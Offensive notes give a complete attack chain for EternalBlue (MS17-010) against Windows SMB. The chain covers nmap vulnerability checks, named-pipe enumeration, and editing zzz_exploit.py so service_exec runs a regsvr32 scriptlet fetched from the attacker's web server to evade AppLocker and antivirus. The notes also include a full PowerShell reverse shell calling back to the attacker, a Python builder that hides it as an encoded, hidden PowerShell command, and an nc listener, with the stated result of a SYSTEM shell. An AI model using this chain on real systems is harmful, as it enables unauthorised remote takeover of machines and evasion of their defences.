Notes for EternalBlue (MS17-010, SMB port 445 attack)
Use nmap to check whether the host is vulnerable to eb: nmap -n -Pn --script=vuln x.x.x.x -p 445 (the vuln category includes smb-vuln-ms17-010 among many other scripts; nmap -n -Pn --script=smb-vuln-ms17-010 x.x.x.x -p 445 runs only the relevant check and makes far less noise). The script reports VULNERABLE when the SMB transaction probe gets the tell-tale STATUS_INSUFF_SERVER_RESOURCES response.
-
An accessible named pipe is required for the manual exploit (zzz_exploit.py takes it as its second argument); enumerate the pipes the target exposes with the auxiliary/scanner/smb/pipe_auditor msf module.
-
Opting for a reverse shell launched through regsvr32 to bypass AppLocker. Calling binaries directly from cmd usually gets flagged by AV; calling them through regsvr32 with an unregistered scriptlet (/n /u /i:) is most likely OK, because regsvr32 is a signed OS binary that is normally whitelisted. This is the well-known "Squiblydoo" trick, so expect current AV/EDR to carry signatures for it even where AppLocker does not stop it.
-
Remote code execution is available through the eb exploit (https://github.com/worawit/MS17-010, zzz_exploit.py)
- add a valid username (USERNAME and PASSWORD at the top of the script; the empty defaults rely on a null session reaching a named pipe, which is why the pipe_auditor step matters)
- enable the execute function and update the command: by default smb_pwn() only creates a test file in C:\ (pwned.txt) and the service_exec() call is commented out. Uncomment it and point it at the hosted caller file: service_exec(conn, r"regsvr32 /s /n /u /i:http://x.x.x.x:8080/desktop.ini scrobj.dll")
-
Create a 'caller' file for regsvr32 to fetch from the victim machine and host it on the attacker machine (e.g. python3 -m http.server 8080 from the directory holding it). The caller is a scriptlet, usually saved as .sct, but the name and extension can be anything (config.ini, doc.txt, readme.md, etc.) because regsvr32 /i: simply downloads and parses whatever the URL returns:
```xml
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Proof Of Concept - Casey Smith @subTee -->
    <!-- License: BSD3-Clause -->
    <script language="JScript">
        <![CDATA[
            var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
        ]]>
    </script>
</registration>
</scriptlet>
```
-
Insert your PowerShell reverse shell into the caller file in place of calc.exe. The .Run() argument has to be a single JScript string, so either escape every double quote in the one-liner or hand the script to powershell.exe base64-encoded with -EncodedCommand. The one-liner used here, with RSC resetting the connection whenever cmd.exe or the socket dies:
```powershell
# RSC: close the socket and cmd.exe and exit; called below whenever either one dies
function RSC {
    if ($c.Connected -eq $true) {$c.Close()};
    if ($p.ExitCode -ne $null) {$p.Close()};
    exit;
};
$a='x.x.x.x';$p='1337';   # attacker IP and listener port
$c=New-Object system.net.sockets.tcpclient;
$c.connect($a,$p);
$s=$c.GetStream();
$nb=New-Object System.Byte[] $c.ReceiveBufferSize;
# $p is reused from here on as the cmd.exe process object
$p=New-Object System.Diagnostics.Process;
$p.StartInfo.FileName='cmd.exe';
$p.StartInfo.RedirectStandardInput=1;
$p.StartInfo.RedirectStandardOutput=1;
$p.StartInfo.UseShellExecute=0;
$p.Start();
$is=$p.StandardInput;$os=$p.StandardOutput;
Start-Sleep 1;
$e=new-object System.Text.AsciiEncoding;
# push the cmd.exe banner and first prompt to the listener
while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};
$s.Write($e.GetBytes($o),0,$o.Length);
$o=$null;$d=$false;$t=0;
while (-not $d) {
    if ($c.Connected -ne $true) {RSC};
    $pos=0;$i=1;
    # read one line (up to a newline, byte 10) from the socket
    while (($i -gt 0) -and ($pos -lt $nb.Length)) {
        $r=$s.Read($nb,$pos,$nb.Length - $pos);
        $pos+=$r;
        if (-not $pos -or $pos -eq 0) {RSC};
        if ($nb[0..$($pos-1)] -contains 10) {break}
    };
    if ($pos -gt 0){
        $str=$e.GetString($nb,0,$pos);
        $is.write($str);      # hand the line to cmd.exe
        start-sleep 1;
        if ($p.ExitCode -ne $null){RSC} else {
            # collect the output, dropping the echoed command itself
            $o=$e.GetString($os.Read());
            while($os.Peek() -ne -1){
                $o += $e.GetString($os.Read());
                if ($o -eq $str) {$o=''}
            };
            $s.Write($e.GetBytes($o),0,$o.length);
            $o=$null;$str=$null
        }
    } else {RSC}
};
```
-
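One way to build the caller file with the reverse shell already embedded, avoiding the quote-escaping problem entirely by passing the script through -EncodedCommand (base64 of the script's UTF-16LE bytes). This is an added Python example, not code from worawit's MS17-010 repo or from the scriptlet PoC; the address, port, URL and file name are placeholders, and DEFAULT_PAYLOAD is a constructed stand-in for the full one-liner above.

```python
#!/usr/bin/env python3
"""Build the regsvr32 'caller' scriptlet for the MS17-010 service_exec step.

The JScript string handed to WScript.Shell.Run cannot hold the PowerShell
one-liner verbatim (it is full of double quotes and braces), so the script is
passed to powershell.exe as -EncodedCommand. The base64 alphabet needs no
escaping inside a JScript string literal, which is the whole point.
"""
import base64
import re

# Constructed stand-in for the reverse-shell one-liner; paste the real script here.
DEFAULT_PAYLOAD = "$a='x.x.x.x';$p='1337';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p)"

# CreateProcess (and therefore WScript.Shell.Run) rejects longer command lines.
MAX_CMDLINE = 32767


def encode_powershell(script: str) -> str:
    """-EncodedCommand expects base64 over UTF-16LE text, with no BOM."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(b64: str) -> str:
    """Inverse of encode_powershell, used to check what the target will really run."""
    return base64.b64decode(b64).decode("utf-16-le")


def build_sct(ps_script: str, progid: str = "PoC",
              classid: str = "{F0001111-0000-0000-0000-0000FEEDACDC}") -> str:
    """Return the scriptlet text with the encoded payload in the Run() call."""
    cmd = f"powershell.exe -nop -w hidden -ep bypass -enc {encode_powershell(ps_script)}"
    if len(cmd) > MAX_CMDLINE:
        raise ValueError(f"command line is {len(cmd)} chars, over the {MAX_CMDLINE} limit")
    # Run(command, 0, false): window style 0 = hidden, do not block on exit
    return (
        '<?XML version="1.0"?>\n'
        "<scriptlet>\n"
        f'<registration progid="{progid}" classid="{classid}">\n'
        '<script language="JScript">\n'
        "<![CDATA[\n"
        f'var r = new ActiveXObject("WScript.Shell").Run("{cmd}", 0, false);\n'
        "]]>\n"
        "</script>\n"
        "</registration>\n"
        "</scriptlet>\n"
    )


def extract_encoded_command(sct: str) -> str:
    """Pull the base64 blob back out of a scriptlet (sanity check before hosting)."""
    m = re.search(r"-enc ([A-Za-z0-9+/=]+)", sct)
    if m is None:
        raise ValueError("no -enc argument found in scriptlet")
    return m.group(1)


def regsvr32_command(url: str) -> str:
    """The command string to drop into service_exec() in zzz_exploit.py (assumed URL)."""
    return f"regsvr32 /s /n /u /i:{url} scrobj.dll"


if __name__ == "__main__":
    sct = build_sct(DEFAULT_PAYLOAD)
    # any file name works: regsvr32 /i: fetches the URL and parses the body as a scriptlet
    with open("desktop.ini", "w") as fh:
        fh.write(sct)
    # round-trip: what the target decodes must be exactly what we wrote
    assert decode_powershell(extract_encoded_command(sct)) == DEFAULT_PAYLOAD
    print(regsvr32_command("http://x.x.x.x:8080/desktop.ini"))
```

Serve the resulting desktop.ini from the attacker box on port 8080 and use the printed regsvr32 line as the service_exec() command; decode_powershell() on the hosted file is a quick way to confirm the host and port inside the payload before firing the exploit.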
Set up your listener, e.g. nc -nlvp 1337, adjusting the port to match the one in the one-liner.
-
Run the eb exploit: service_exec launches regsvr32 on the victim, regsvr32 fetches the caller file, and the caller file runs your reverse shell, which connects back to the listener. Because service_exec runs the command as a service, the shell comes back as NT AUTHORITY\SYSTEM.
-